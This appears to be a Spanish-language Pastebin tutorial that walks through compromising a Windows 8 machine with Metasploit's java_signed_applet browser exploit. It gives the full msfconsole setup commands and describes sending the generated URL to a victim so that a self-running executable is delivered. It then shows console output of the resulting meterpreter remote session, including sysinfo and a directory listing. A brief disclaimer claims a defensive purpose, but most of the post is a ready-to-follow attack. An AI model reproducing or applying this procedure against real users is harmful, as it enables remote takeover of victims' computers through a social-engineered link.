Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Bueno primero que nada quiero hacerles una breve explcasion Esto se Crea con fines de Mejorar la seguridad en Windows 8, Mucha gente lo Usa con fines destructivos, Eso queda a cargo de Ustedes Amen de enseñar a destrucir Miren el Lado positivo, Siempre que aprendan atacar, deben tener un AS bajo la manga de saber como defenderse del Mismo ataque en caso de que sea usado en contra de ustedes mismos, Recuerdenlo!
- Ok, Empecemos con una Leve introduccion sobre Windows 8.
- Segun Wikipedia: Windows 8 es la versión actual del sistema operativo de Microsoft Windows, producido por Microsoft para su uso en computadoras personales, incluidas computadoras de escritorio en casa y de negocios, computadoras portátiles, netbooks, tabletas, servidores y centros multimedia. Añade soporte para microprocesadores ARM, además de los microprocesadores tradicionales x86 de Intel y AMD. Su interfaz de usuario ha sido modificada para hacerla más adecuada para su uso con pantallas táctiles, además de los tradicionales ratón y teclado.
- El procedimiento que realize para comprometer la seguridad de Windows 8 son los siguientes:
- REQUERIMIENTOS:
- - Backtrack 5 R1 - R2 o R3 (Atacante)
- - Metasploit Framework (Atacante)
- - Windows 8 (Victima)
- - Google Chorme, Firefox o IE (Victima)
- PROCEDIMIENTO DEL ATAQUE:
- Abrimos Metasploit (msfconsole) y ejecutamos los siguientes comandos:
- -----------------------------------------------------
- Codigo:
- use exploit/multi/browser/java_signed_applet (Modulo Java para diferentes navegadores)
- set lhost 192.168.1.17 (IP del Atacante)
- set lport 80 (Puerto)
- set uripath / (Path del link a enviar)
- exploit
- -----------------------------------------------------
- msf> use exploit/multi/browser/java_signed_applet
- msf> exploit(java_signed_applet) > set LHOST 192.168.1.17(Ip Atackante)
- LHOST => 192.168.1.17
- msf> exploit(java_signed_applet) > set LPORT 80
- LPORT => 80
- msf> exploit(java_signed_applet) > set URIPATH /
- URIPATH => /
- msf> exploit(java_signed_applet) > exploit
- Despues de ejecutar los comandos mencionados, MSF generara una URL (http://192.168.1.17:8080) que sera enviada a la victima con Windows 8, esta contendra un archivo (.exe) que se autoejecutara al momento de abrirlo en cualquier navegador web, ya sea en Internet Explorer 10 (version que integra Windows 8 ) Google Chorme, Opera o Firefox.
- He aqui un ejemplo de la session meterpreter que se crea al momento de ejecutar la URL generada por Metasploit:
- [*] Using URL: http://0.0.0.0:8080/
- [*] Local IP: http://192.168.1.17:8080
- [*] Server Started.
- [*] 192.168.1.17 java_signed_applet - Handling request
- [*] 192.168.1.17 java_signed_applet - Handling request
- [*] 192.168.1.17 java_signed_applet - Sending SiteLoader.jar. Waiting for user to click
- [*] 192.168.1.17 java_signed_applet - Sending SiteLoader.jar. Waiting for user to click
- [*] 192.168.1.17 java_signed_applet - Sending SiteLoader.jar. Waiting for user to click
- [*] 192.168.1.17 java_signed_applet - Handling request
- Esto quiere decir que hemos VULNERADO el Windows 8 con una simple URL, seguidamente ejecutaremos los comandos correspondientes para obtener la informacion del sistema.
- msf exploit(java_signed_applet) > sessions -l
- Active sessions
- ===============
- Id Type Information Connection
- -- ---- ----------- ----------
- 1 meterpreter x86/win32 CL-Security\Caleb @ CL-Security 192.168.1.17:80 -> 192.168.1.17:80
- msf exploit(java_signed_applet) > sessions -i l
- [*] Starting interaction with l...
- meterpreter > sysinfo
- Computer : CL-Security
- OD : Windows 8 (Build 8400)
- Architecture : x86
- System Language : es_ES
- Meterpreter : x86/win32
- meterpreter > pwd
- C:\Users\Caleb\Desktop
- meterpreter >
- Las pruebas fueron realizadas en el Sistema Operativo Windows 8 con el Firewall, Windows Defender, Actualizaciones Automaticas, Internet Explorer 10 (modo seguro) respectivamente ACTIVADO.
- Si desean realizar sus propias Pruebas de Seguridad, pueden descargar el Windows 8 e instalarlo en una Maquina Virtual, recomendable usar el VMWARE.
- Atte: Mayk0
- Contacto!: http://www.facebook.com/Maaykooo
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement